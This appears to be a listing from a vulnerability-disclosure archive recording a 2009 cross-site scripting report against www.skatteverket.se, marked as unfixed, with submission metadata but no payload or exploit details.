Security researcher DellNull submitted a cross-site scripting (XSS) vulnerability affecting www.skatteverket.se on 15/05/2009; at the time of submission the site ranked 17998 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 21/11/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
| Date submitted | Date published | Status | Author | Domain | Category | Pagerank |
|---|---|---|---|---|---|---|
| 15/05/2009 | 21/11/2010 | UNFIXED | DellNull | www.skatteverket.se | XSS | 17998 |
 
 